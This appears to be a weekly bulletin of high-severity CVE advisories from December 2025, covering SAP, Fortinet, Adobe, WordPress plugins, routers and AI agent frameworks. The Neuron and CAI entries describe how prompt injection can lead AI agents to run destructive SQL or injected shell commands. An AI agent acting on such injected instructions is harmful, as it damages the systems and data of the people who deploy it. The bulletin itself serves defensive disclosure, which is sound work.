| SAP_SE--SAP Solution Manager | Due to missing input sanitation, SAP Solution Manager allows an authenticated attacker to insert malicious code when calling a remote-enabled function module. This could provide the attacker with full control of the system hence leading to high impact on confidentiality, integrity and availability of the system. | 2025-12-09 | 9.9 | CVE-2025-42880 | https://me.sap.com/notes/3685270 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP jConnect - SDK for ASE | Under certain conditions, a high privileged user could exploit a deserialization vulnerability in SAP jConnect to launch remote code execution. The system may be vulnerable when specially crafted input is used to exploit the vulnerability resulting in high impact on confidentiality, integrity and availability of the system. | 2025-12-09 | 9.1 | CVE-2025-42928 | https://me.sap.com/notes/3685286 https://url.sap/sapsecuritypatchday |
| Fortinet--FortiSwitchManager | A improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0.0 through 7.0.21, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message. | 2025-12-09 | 9.1 | CVE-2025-59718 | https://fortiguard.fortinet.com/psirt/FG-IR-25-647 |
| Fortinet--FortiWeb | An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message. | 2025-12-09 | 9.1 | CVE-2025-59719 | https://fortiguard.fortinet.com/psirt/FG-IR-25-647 |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Unrestricted Upload of File with Dangerous Type vulnerability that could lead to arbitrary code execution by a high priviledged attacker. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 9.1 | CVE-2025-61808 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized read and write access. Exploitation of this issue does not require user interaction and scope is unchanged. | 2025-12-09 | 9.1 | CVE-2025-61809 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page. | 2025-12-10 | 9.3 | CVE-2025-64537 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page. | 2025-12-10 | 9.3 | CVE-2025-64538 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page. | 2025-12-10 | 9.3 | CVE-2025-64539 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 3 | 2025-12-11 | 9.8 | CVE-2025-66043 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 64 | 2025-12-11 | 9.8 | CVE-2025-66044 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 65 | 2025-12-11 | 9.8 | CVE-2025-66045 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 67 | 2025-12-11 | 9.8 | CVE-2025-66046 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 131 | 2025-12-11 | 9.8 | CVE-2025-66047 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exists in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities.When Tag is 133 | 2025-12-11 | 9.8 | CVE-2025-66048 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| ThinkInAIXYZ--deepchat | DeepChat is an open-source AI chat platform that supports cloud models and LLMs. Versions 0.5.1 and below are vulnerable to XSS attacks through improperly sanitized Mermaid content. The recent security patch for MermaidArtifact.vue is insufficient and can be bypassed using unquoted HTML attributes combined with HTML entity encoding. Remote Code Execution is possible on the victim's machine via the electron.ipcRenderer interface, bypassing the regex filter intended to strip dangerous attributes. There is no fix at time of publication. | 2025-12-09 | 9.7 | CVE-2025-66481 | https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-h9f5-7hhf-fqm4 |
| vitejs--vite-plugin-react | @vitejs/plugin-rs provides React Server Components (RSC) support for Vite. Versions 0.5.5 and below are vulnerable to arbitrary remote code execution on the development server through unsafe dynamic imports in server function APIs (loadServerAction, decodeReply, decodeAction) when integrated into RSC applications that expose server function endpoints. Attackers with network access to the development server can read/modify files, exfiltrate sensitive data (source code, environment variables, credentials), or pivot to other internal services. While this affects development servers only, the risk increases when using vite --host to expose the server on all network interfaces. This issue is fixed in version 0.5.6. | 2025-12-09 | 9.8 | CVE-2025-67489 | https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-j76j-5p5g-9wfr https://github.com/vitejs/vite-plugin-react/commit/fe634b58210d0a4a146a7faae56cd71af3bb9af4 |
| zitadel--zitadel | ZITADEL is an open-source identity infrastructure tool. Versions 4.7.0 and below are vulnerable to an unauthenticated, full-read SSRF vulnerability. The ZITADEL Login UI (V2) treats the x-zitadel-forward-host header as a trusted fallback for all deployments, including self-hosted instances. This allows an unauthenticated attacker to force the server to make HTTP requests to arbitrary domains, such as internal addresses, and read the responses, enabling data exfiltration and bypassing network-segmentation controls. This issue is fixed in version 4.7.1. | 2025-12-09 | 9.3 | CVE-2025-67494 | https://github.com/zitadel/zitadel/security/advisories/GHSA-7wfc-4796-gmg5 https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96 |
| WBCE--WBCE_CMS | WBCE CMS is a content management system. Versions 1.6.4 and below use function GenerateRandomPassword() to create passwords using PHP's rand(). rand() is not cryptographically secure, which allows password sequences to be predicted or brute-forced. This can lead to user account compromise or privilege escalation if these passwords are used for new accounts or password resets. The vulnerability is fixed in version 1.6.5. | 2025-12-09 | 9.1 | CVE-2025-67504 | https://github.com/WBCE/WBCE_CMS/security/advisories/GHSA-76gj-pmvx-jcc6 https://github.com/WBCE/WBCE_CMS/commit/5d59fe021a5c6e469b1bf192b72ca652e54278f6 https://cwe.mitre.org/data/definitions/338.html https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.5 |
| pipeshub-ai--pipeshub-ai | PipesHub is a fully extensible workplace AI platform for enterprise search and workflow automation. Versions prior to 0.1.0-beta expose POST /api/v1/record/buffer/convert through missing authentication. The endpoint accepts a file upload and converts it to PDF via LibreOffice by uploading payload to os.path.join(tmpdir, file.filename) without normalizing the filename. An attacker can submit a crafted filename containing ../ sequences to write arbitrary files anywhere the service account has permission, enabling remote file overwrite or planting malicious code. This issue is fixed in version 0.1.0-beta. | 2025-12-10 | 9.8 | CVE-2025-67506 | https://github.com/pipeshub-ai/pipeshub-ai/security/advisories/GHSA-w398-9m55-2357 https://github.com/pipeshub-ai/pipeshub-ai/commit/987ebab40a1fc39956730ed93220f7f9b2c4e5f8 |
| neuron-core--neuron-ai | Neuron is a PHP framework for creating and orchestrating AI Agents. In versions 2.8.11 and below, the MySQLWriteTool executes arbitrary SQL provided by the caller using PDO::prepare() + execute() without semantic restrictions. This is consistent with the name ("write tool"), but in an LLM/agent context it becomes a high-risk capability: prompt injection or indirect prompt manipulation can cause execution of destructive queries such as DROP TABLE, TRUNCATE, DELETE, ALTER, or privilege-related statements (subject to DB permissions). Deployments that expose an agent with MySQLWriteTool enabled to untrusted input and/or run the tool with a DB user that has broad privileges are impacted. This issue is fixed in version 2.8.12. | 2025-12-10 | 9.4 | CVE-2025-67510 | https://github.com/neuron-core/neuron-ai/security/advisories/GHSA-898v-775g-777c https://github.com/neuron-core/neuron-ai/commit/44bab85d92bf162898ee48d0bcef6ba0d29b59c9 https://github.com/neuron-core/neuron-ai/releases/tag/2.8.12 |
| aliasrobotics--cai | Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection; while username, host and port values are injectable. This issue does not have a fix at the time of publication. | 2025-12-10 | 9.7 | CVE-2025-67511 | https://github.com/aliasrobotics/cai/security/advisories/GHSA-4c65-9gqf-4w8h https://github.com/aliasrobotics/cai/commit/09ccb6e0baccf56c40e6cb429c698750843a999c https://www.hacktivesecurity.com/blog/2025/12/10/cve-2025-67511-tricking-a-security-ai-agent-into-pwning-itself |
| ShaneIsrael--fireshare | Fireshare facilitates self-hosted media and link sharing. Versions 1.2.30 and below allow an authenticated user, or unauthenticated user if the Public Uploads setting is enabled, to craft a malicious filename when uploading a video file. The malicious filename is then concatenated directly into a shell command, which can be used for uploading files to arbitrary directories via path traversal, or executing system commands for Remote Code Execution (RCE). This issue is fixed in version 1.3.0. | 2025-12-12 | 9.8 | CVE-2025-67728 | https://github.com/ShaneIsrael/fireshare/security/advisories/GHSA-c4f5-g622-q72m https://github.com/ShaneIsrael/fireshare/commit/157386c85f6683f89192dae52115069b435b6d34 |
| JBL--LIVE PRO 2 TWS | Due to improper BLE security configurations on the device's GATT server, an adjacent unauthenticated attacker can read and write device control commands through the mobile app service wich could render the device unusable. | 2025-12-10 | 8.8 | CVE-2024-2104 | https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2025/hbsa-2025-0001.json https://certvde.com/en/advisories/VDE-2024-076 |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). The DHCP Server configuration file of the affected products is subject to code injection. An attacker could leverage this vulnerability to spawn a reverse shell and gain root access on the affected system. | 2025-12-09 | 8.8 | CVE-2024-56835 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| wondercms--WonderCMS | WonderCMS 4.3.2 contains a cross-site scripting vulnerability that allows attackers to inject malicious JavaScript through the module installation endpoint. Attackers can craft a specially designed XSS payload to install a reverse shell module and execute remote commands by tricking an authenticated administrator into accessing a malicious link. | 2025-12-12 | 8.8 | CVE-2024-58305 | ExploitDB-51805 WonderCMS Github Repository WonderCMS Homepage VulnCheck Advisory: WonderCMS 4.3.2 Cross-Site Scripting Remote Code Execution via Module Installation |
| ATCOM Technology co., LTD.--100M IP Phones | Atcom 100M IP Phones firmware version 2.7.x.x contains an authenticated command injection vulnerability in the web configuration CGI script that allows attackers to execute arbitrary system commands. Attackers can inject shell commands through the 'cmd' parameter in web_cgi_main.cgi, enabling remote code execution with administrative credentials. | 2025-12-12 | 8.8 | CVE-2024-58314 | ExploitDB-51742 Atcom IP Phone Webpage VulnCheck Advisory: Atcom 2.7.x.x Authenticated Command Injection via Web Configuration CGI |
| Insyde Software--InsydeH2O | Unchecked output buffer may allowed arbitrary code execution in SMM and potentially result in SMM memory corruption. | 2025-12-12 | 8.2 | CVE-2025-10451 | https://www.insyde.com/security-pledge/sa-2025009/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.11 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have, under certain circumstances, allowed an unauthenticated user to perform unauthorized actions on behalf of another user by injecting malicious external scripts into the Swagger UI." | 2025-12-11 | 8 | CVE-2025-12029 | GitLab Issue #577975 HackerOne Bug Bounty Report #3317485 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that, under certain conditions could have allowed an authenticated user to perform unauthorized actions on behalf of another user by creating wiki pages with malicious content. | 2025-12-11 | 8.7 | CVE-2025-12716 | GitLab Issue #579548 HackerOne Bug Bounty Report #3405832 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| tharkun69--Player Leaderboard | The Player Leaderboard plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.0.2 via the 'player_leaderboard' shortcode. This is due to the plugin using an unsanitized user-supplied value from the shortcode's 'mode' attribute in a call to include() without proper path validation. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve full remote code execution if combined with file upload capabilities. | 2025-12-12 | 8.8 | CVE-2025-12824 | https://www.wordfence.com/threat-intel/vulnerabilities/id/527f8f08-bab3-4319-99bf-845c8b378c19?source=cve https://plugins.trac.wordpress.org/browser/player-leaderboard/trunk/public/class-player-leaderboard-public.php#L1419 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416129%40player-leaderboard&new=3416129%40player-leaderboard |
| Dassault Systmes--ENOVIA Collaborative Industry Innovator | A reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session. | 2025-12-08 | 8.7 | CVE-2025-12956 | https://www.3ds.com/trust-center/security/security-advisories/cve-2025-12956 |
| infility--Infility Global | The Infility Global plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in all versions up to, and including, 2.14.23. This is due to the `upload_file` function in the `infility_import_file` class only validating the MIME type which can be easily spoofed, and the `import_data` function missing capability checks. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-12 | 8.8 | CVE-2025-12968 | https://www.wordfence.com/threat-intel/vulnerabilities/id/542a18f6-9d17-4e54-85e1-e01630ca371e?source=cve https://wordpress.org/plugins/infility-global/ |
| wp3d--WP3D Model Import Viewer | The WP3D Model Import Viewer plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the handle_import_file() function in all versions up to, and including, 1.0.7. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-13 | 8.8 | CVE-2025-13094 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3144f190-232c-40c0-9e4b-d1cedfe52b26?source=cve https://wordpress.org/plugins/wp3d-model-import-block/ |
| IBM--Aspera Orchestrator | IBM Aspera Orchestrator 4.0.0 through 4.1.0 could allow could an authenticated user to change the password of another user without prior knowledge of that password. | 2025-12-11 | 8.1 | CVE-2025-13148 | https://www.ibm.com/support/pages/node/7254434 |
| blazethemes--Blaze Demo Importer | The Blaze Demo Importer plugin for WordPress is vulnerable to unauthorized database resets and file deletion due to a missing capability check on the "blaze_demo_importer_install_demo" function in all versions up to, and including, 1.0.13. This makes it possible for authenticated attackers, with subscriber level access and above, to reset the database by truncating all tables (except options, usermeta, and users), delete all sidebar widgets, theme modifications, and content of the uploads folder. | 2025-12-12 | 8.1 | CVE-2025-13334 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d83cd6a0-d69c-4e6c-b76f-00c398b5f7e6?source=cve https://plugins.trac.wordpress.org/browser/blaze-demo-importer/tags/1.0.13/blaze-demo-importer.php?marks=67-89#L68 |
| IBM--Aspera Orchestrator | IBM Aspera Orchestrator 4.0.0 through 4.1.0 could allow an authenticated user to execute arbitrary commands with elevated privileges on the system due to improper validation of user supplied input. | 2025-12-11 | 8.8 | CVE-2025-13481 | https://www.ibm.com/support/pages/node/7254434 |
| Nebim Neyir Computer Industry and Services Inc.--Nebim V3 ERP | Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database. This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1. | 2025-12-12 | 8.8 | CVE-2025-13506 | https://www.usom.gov.tr/bildirim/tr-25-0450 |
| Ivanti--Endpoint Manager | Improper control of dynamically managed code resources in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote, unauthenticated attacker to write arbitrary files on the server, potentially leading to remote code execution. User interaction is required. | 2025-12-09 | 8.8 | CVE-2025-13659 | https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 |
| OpenPLC_V3--OpenPLC_V3 | OpenPLC_V3 is vulnerable to a cross-site request forgery (CSRF) attack due to the absence of proper CSRF validation. This issue allows an unauthenticated attacker to trick a logged-in administrator into visiting a maliciously crafted link, potentially enabling unauthorized modification of PLC settings or the upload of malicious programs which could lead to significant disruption or damage to connected systems. | 2025-12-13 | 8 | CVE-2025-13970 | https://github.com/thiagoralves/OpenPLC_v3 https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-345-10.json |
| rodgerholl--Visitor Logic Lite | The Visitor Logic Lite plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.3 via deserialization of untrusted input from the `lpblocks` cookie. This is due to the `lp_track()` function passing unsanitized cookie data directly to the `unserialize()` function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code granted they can access the WordPress site. | 2025-12-12 | 8.1 | CVE-2025-14044 | https://www.wordfence.com/threat-intel/vulnerabilities/id/60fb6928-96fb-4c1f-989c-cc07965b5266?source=cve https://plugins.trac.wordpress.org/browser/logic-pro/trunk/logic-lite.php#L131 https://plugins.trac.wordpress.org/browser/logic-pro/tags/1.0.3/logic-lite.php#L131 |
| videomerchant--Video Merchant | The Video Merchant plugin for WordPress is vulnerable to Cross-Site Request Forgery in version <= 5.0.4. This is due to missing or incorrect nonce validation on the video_merchant_add_video_file() function. This makes it possible for unauthenticated attackers to upload arbitrary files that make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-12-10 | 8.8 | CVE-2025-14390 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7cbe39ae-d10b-432f-afab-682948de2521?source=cve https://wordpress.org/plugins/video-merchant |
| franciscopalacios--Postem Ipsum | The Postem Ipsum plugin for WordPress is vulnerable to unauthorized modification of data to Privilege Escalation due to a missing capability check on the postem_ipsum_generate_users() function in all versions up to, and including, 3.0.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create arbitrary user accounts with the administrator role. | 2025-12-13 | 8.8 | CVE-2025-14397 | https://www.wordfence.com/threat-intel/vulnerabilities/id/229c146d-3f99-4f63-9a6f-997075846815?source=cve https://plugins.trac.wordpress.org/browser/postem-ipsum/trunk/admin/postem-ipsum-admin.php#L1150 |
| nenad-obradovic--Extensive VC Addons for WPBakery page builder | The Extensive VC Addons for WPBakery page builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9.1 via the `extensive_vc_get_module_template_part` function. This is due to insufficient path normalization and validation of the user-supplied `shortcode_name` parameter in the `extensive_vc_init_shortcode_pagination` AJAX action. This makes it possible for unauthenticated attackers to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files via the `shortcode_name` parameter. | 2025-12-13 | 8.1 | CVE-2025-14475 | https://www.wordfence.com/threat-intel/vulnerabilities/id/49711408-5d04-4fdd-a6c4-b224959ba1bc?source=cve https://plugins.trac.wordpress.org/browser/extensive-vc-addon/trunk/lib/helpers-functions.php#L78 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/tags/1.9.1/lib/helpers-functions.php#L78 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/trunk/shortcodes/shortcodes-functions.php#L122 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/tags/1.9.1/shortcodes/shortcodes-functions.php#L122 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/trunk/shortcodes/shortcodes-functions.php#L142 https://plugins.trac.wordpress.org/browser/extensive-vc-addon/tags/1.9.1/shortcodes/shortcodes-functions.php#L142 |
| unitecms--Doubly Cross Domain Copy Paste for WordPress | The Doubly - Cross Domain Copy Paste for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.0.46 via deserialization of untrusted input from the content.txt file within uploaded ZIP archives. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP Object. The additional presence of a POP chain allows attackers to execute arbitrary code, delete files, retrieve sensitive data, or perform other actions depending on the available gadgets. This is only exploitable by subscribers, when administrators have explicitly enabled that access. | 2025-12-13 | 8.8 | CVE-2025-14476 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4b2c3987-fe7e-426d-8398-acdd6fa3a3dd?source=cve https://plugins.trac.wordpress.org/browser/doubly/trunk/inc_php/functions.class.php#L1040 https://plugins.trac.wordpress.org/browser/doubly/tags/1.0.46/inc_php/functions.class.php#L1040 https://plugins.trac.wordpress.org/browser/doubly/trunk/inc_php/importer.class.php#L2536 https://plugins.trac.wordpress.org/browser/doubly/tags/1.0.46/inc_php/importer.class.php#L2536 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw in libsoup's HTTP header handling allows multiple Host: headers in a request and returns the last occurrence for server-side processing. Common front proxies often honor the first Host: header, so this mismatch can cause vhost confusion where a proxy routes a request to one backend but the backend interprets it as destined for another host. This discrepancy enables request-smuggling style attacks, cache poisoning, or bypassing host-based access controls when an attacker supplies duplicate Host headers. | 2025-12-11 | 8.2 | CVE-2025-14523 | https://access.redhat.com/security/cve/CVE-2025-14523 RHBZ#2421349 |
| Tenda--CH22 | A security flaw has been discovered in Tenda CH22 1.0.0.1. This affects the function frmL7ImForm of the file /goform/L7Im. Performing manipulation of the argument page results in buffer overflow. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. | 2025-12-11 | 8.8 | CVE-2025-14526 | VDB-335866 | Tenda CH22 L7Im frmL7ImForm buffer overflow VDB-335866 | CTI Indicators (IOB, IOC, IOA) Submit #703035 | Tenda CH22 V1.0.0.1 Buffer overflow vulnerability https://github.com/maximdevere/CVE2/issues/5 https://github.com/maximdevere/CVE2/issues/5#issue-3673676260 https://www.tenda.com.cn/ |
| UTT-- 512W | A vulnerability was found in UTT 进取 512W up to 1.7.7-171114. This affects an unknown part of the file /goform/formWebAuthGlobalConfig. Performing manipulation of the argument hidcontact results in memory corruption. Remote exploitation of the attack is possible. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-12 | 8.8 | CVE-2025-14572 | VDB-336196 | UTT 进取 512W formWebAuthGlobalConfig memory corruption VDB-336196 | CTI Indicators (IOB, IOC, IOA) Submit #704107 | UTT (AiTai) Jinqi 512W <=v3v1.7.7-171114 Buffer Overflow https://github.com/alc9700jmo/CVE/issues/21 |
| Tenda--AC20 | A vulnerability was identified in Tenda AC20 16.03.08.12. The affected element is the function formSetPPTPUserList of the file /goform/setPptpUserList of the component httpd. Such manipulation of the argument list leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. | 2025-12-14 | 8.8 | CVE-2025-14654 | VDB-336387 | Tenda AC20 httpd setPptpUserList formSetPPTPUserList stack-based overflow VDB-336387 | CTI Indicators (IOB, IOC, IOA) Submit #712899 | Tenda AC20 V16.03.08.12 Buffer Overflow https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN12/AC20_SetPptpUserList.md https://www.tenda.com.cn/ |
| Tenda--AC20 | A security flaw has been discovered in Tenda AC20 16.03.08.12. The impacted element is the function formSetRebootTimer of the file /goform/SetSysAutoRebbotCfg of the component httpd. Performing manipulation of the argument rebootTime results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. | 2025-12-14 | 8.8 | CVE-2025-14655 | VDB-336388 | Tenda AC20 httpd SetSysAutoRebbotCfg formSetRebootTimer stack-based overflow VDB-336388 | CTI Indicators (IOB, IOC, IOA) Submit #712910 | Tenda AC20 V16.03.08.12 Buffer Overflow https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN13/AC20_SetSysAutoRebbotCfg.md https://www.tenda.com.cn/ |
| Tenda--AC20 | A weakness has been identified in Tenda AC20 16.03.08.12. This affects the function httpd of the file /goform/openSchedWifi. Executing manipulation of the argument schedStartTime/schedEndTime can lead to buffer overflow. The attack may be performed from remote. The exploit has been made available to the public and could be exploited. | 2025-12-14 | 8.8 | CVE-2025-14656 | VDB-336389 | Tenda AC20 openSchedWifi httpd buffer overflow VDB-336389 | CTI Indicators (IOB, IOC, IOA) Submit #712917 | Tenda AC20 V16.03.08.12 Buffer Overflow https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN14/AC20_openSchedWifi.md https://www.tenda.com.cn/ |
| D-Link--DIR-860LB1 | A vulnerability was detected in D-Link DIR-860LB1 and DIR-868LB1 203b01/203b03. Affected is an unknown function of the component DHCP Daemon. The manipulation of the argument Hostname results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used. | 2025-12-14 | 8.8 | CVE-2025-14659 | VDB-336391 | D-Link DIR-860LB1/DIR-868LB1 DHCP command injection VDB-336391 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #713701 | D-Link DIR-860LB1 v203b03 Command Injection Submit #714709 | D-Link DIR-868LB1 v203b01 Command Injection (Duplicate) https://tzh00203.notion.site/D-Link-DIR-860LB1-v203b03-Command-Injection-in-DHCPd-2c6b5c52018a807eab1ae73dbd95eee3?source=copy_link https://tzh00203.notion.site/D-Link-DIR-868LB1-v203b01-Command-Injection-in-DHCPd-2c8b5c52018a805296c3dea51a7a4070?source=copy_link https://www.dlink.com/ |
| Infinera--MTC-9 | Server-Side Request Forgery (SSRF) vulnerability in Infinera MTC-9 version allows remote unauthenticated users to gain access to other network resources using HTTPS requests through the appliance used as a bridge. | 2025-12-08 | 8.6 | CVE-2025-26487 | https://www.cvcn.gov.it/cvcn/cve/CVE-2025-26487 |
| NVIDIA--Merlin Transformers4Rec | NVIDIA Merlin Transformers4Rec for Linux contains a vulnerability in the Trainer component, where a user could cause a deserialization issue. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2025-12-09 | 8.8 | CVE-2025-33213 | https://nvd.nist.gov/vuln/detail/CVE-2025-33213 https://www.cve.org/CVERecord?id=CVE-2025-33213 https://nvidia.custhelp.com/app/answers/detail/a_id/5739 |
| NVIDIA--NVTabular | NVIDIA NVTabular for Linux contains a vulnerability in the Workflow component, where a user could cause a deserialization issue. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering. | 2025-12-09 | 8.8 | CVE-2025-33214 | https://nvd.nist.gov/vuln/detail/CVE-2025-33214 https://www.cve.org/CVERecord?id=CVE-2025-33214 https://nvidia.custhelp.com/app/answers/detail/a_id/5739 |
